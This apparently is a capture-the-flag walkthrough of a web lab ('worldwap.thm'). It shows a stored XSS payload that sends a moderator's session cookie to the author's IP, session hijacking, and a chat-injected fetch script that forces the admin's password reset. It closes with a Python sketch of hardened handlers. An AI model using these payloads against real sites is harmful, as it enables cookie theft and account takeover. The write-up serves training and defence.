WhatsYourName?

[screenshot]

Target IP: 10.10.13.206
Challenge Description:

[screenshot]


Reconnaissance

[screenshot]
This challenge requires me to add the hostname worldwap.thm to my /etc/hosts file first. After doing so, I ran a TCP port scan with the command sudo nmap -sS worldwap.thm -p- and identified three open ports on the target machine: SSH, HTTP, and a second HTTP application on port 8081, as shown above.

[screenshot]
After identifying three services on the target machine, I ran a service and version scan against those ports with the command sudo nmap -sV -A worldwap.thm -p 22,80,8081, which produced the result shown above. Since the challenge is to attack the web application via XSS/CSRF, it is time to enumerate the web applications.


Enumeration

Port 80: HTTP
[screenshot]
Browsing to http://worldwap.thm returns the webpage shown above. I notice there is a Register button at the top of the web application.

[screenshot]
The registration webpage above is returned after pressing the Register button from the previous image. Right away, I notice the information message "You can now pre-register! Your details will be reviewed by the site moderator." Maybe I can perform an XSS attack here, as the submitted details are reviewed by the moderator team. Maybe I can obtain the moderator's cookie?

[screenshot]
To test if the web application is vulnerable to XSS/CSRF attacks, I started a Python HTTP server on my machine using the command python3 -m http.server 80. Then I injected the payload <script>fetch("http://10.14.55.153/");</script> inside the different parameters.


Exploitation via XSS (Moderator to Admin Privilege Escalation on the Web Application)

[screenshot]
After some manual testing, I noticed the Name parameter is vulnerable, as I received the HTTP request made by the target machine to my machine on port 80. Now I can use the modified payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> to obtain the cookie of the website's moderator :)

[screenshot]
And bingo! I registered using the details shown above. I inserted the cookie stealing payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> inside the Name parameter and obtained the cookie of the user moderator as shown above.

[screenshot]
After decoding this value using the Decoder tool in Burp Suite, I obtained the result PHPSESSID=vegc1vmobcp87r0vdjuumhapvo, as shown above. Now I can use the cookie value vegc1vmobcp87r0vdjuumhapvo to access the web application as the moderator.

[screenshot]
I set the PHPSESSID cookie to vegc1vmobcp87r0vdjuumhapvo directly in the web browser, as shown above.

[screenshot]
After changing the cookie to the moderator's value, I refreshed the webpage and obtained the result shown above. Now I have access to the web application as the moderator :) I did not find anything useful here, however. During the earlier enumeration, when I tried to register as a user, I identified the hostname login.worldwap.thm. Since I have moderator access on this web application, maybe I can access that one as the same user too?

[screenshot]
And bingo! Now I have access to the other web application as the moderator. I notice it is possible to change the password. Maybe I can force a password change for the user admin? There is also a chat application.

[screenshot]
The chat application webpage is shown above. Can it be used to talk to the admin? Maybe I can perform an XSS attack here too?

[screenshot]
I used the payload <script>alert(1);</script> first.

[screenshot]
And yep, the chat application is vulnerable to XSS, as the alert function executed successfully. Time to test the Change Password functionality too.

[screenshot]
I ran Burp Suite and changed the password of the user moderator to password, as shown above. When I intercepted the HTTP request, I noticed a single parameter called new_password in which the password is sent in plaintext; the request does not require the current password. I can force the admin user to change password.

[screenshot]
To accomplish this, I used the Change Password functionality again in the web browser, as shown above. Then I copied the POST request using Copy as Fetch. Next I modified the request parameters to force the password reset; the resulting script is shown above. I will need to deploy the following script inside the chat application to force the password of the user admin to be reset to password:

<script>fetch("/change_password.php", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "/change_password.php",
    "body": "new_password=password",
    "method": "POST",
    "mode": "cors"
});</script>
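As an added defensive illustration (my own model, not the room's application code), the following Python contrasts a change-password handler that behaves like the observed one, which accepts only new_password, with a hardened handler that re-authenticates with the current password, and applies output encoding to the Name field that carried the cookie-stealing payload. The Session class, user table and field names other than new_password are constructed assumptions.

```python
import hmac
import html
import secrets
from dataclasses import dataclass, field

# Constructed in-memory stand-ins for the PHP session and the user table on
# login.worldwap.thm. Hypothetical model, not the application's real code;
# passwords are kept in plaintext only to keep the model short.
@dataclass
class Session:
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))

def change_password_vulnerable(session, form, users):
    """Models the observed handler: only new_password is checked, so any
    request that carries the victim's PHPSESSID cookie succeeds."""
    users[session.user] = form["new_password"]
    return True

def change_password_hardened(session, form, users):
    """Requires a CSRF token and re-authentication with the current password.
    The token alone would not stop the attack in the writeup, because the
    injected script runs in the same origin and can read it from the page;
    the current-password check is what the script cannot satisfy."""
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return False
    if not hmac.compare_digest(form.get("current_password", ""), users[session.user]):
        return False
    users[session.user] = form["new_password"]
    return True

def render_name(name):
    """Output-encode the Name field before the moderator's browser renders it,
    which turns the stored <script> payload into inert text."""
    return html.escape(name, quote=True)

def simulate_forced_change():
    """Replays the forced new_password=password request from the writeup
    against both handlers, as the admin's session. Returns the outcomes."""
    users = {"admin": "S3cretAdminPw!", "moderator": "modpass"}  # constructed
    admin_session = Session(user="admin")
    # What the XSS-injected fetch() can send: the new password plus a CSRF
    # token scraped from the DOM, but never the admin's current password.
    forced = {"new_password": "password", "csrf_token": admin_session.csrf_token}
    vuln = change_password_vulnerable(admin_session, forced, users.copy())
    hard = change_password_hardened(admin_session, forced, users.copy())
    return {"vulnerable_changed": vuln, "hardened_changed": hard}
```

Setting the HttpOnly flag on PHPSESSID would additionally have blocked the document.cookie exfiltration shown earlier, but not the forced request, which rides on the browser's own cookie jar.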

[screenshot]
After logging out of the web application as the moderator, I logged in with the credentials admin:password and gained access to the web application as the admin. GG :)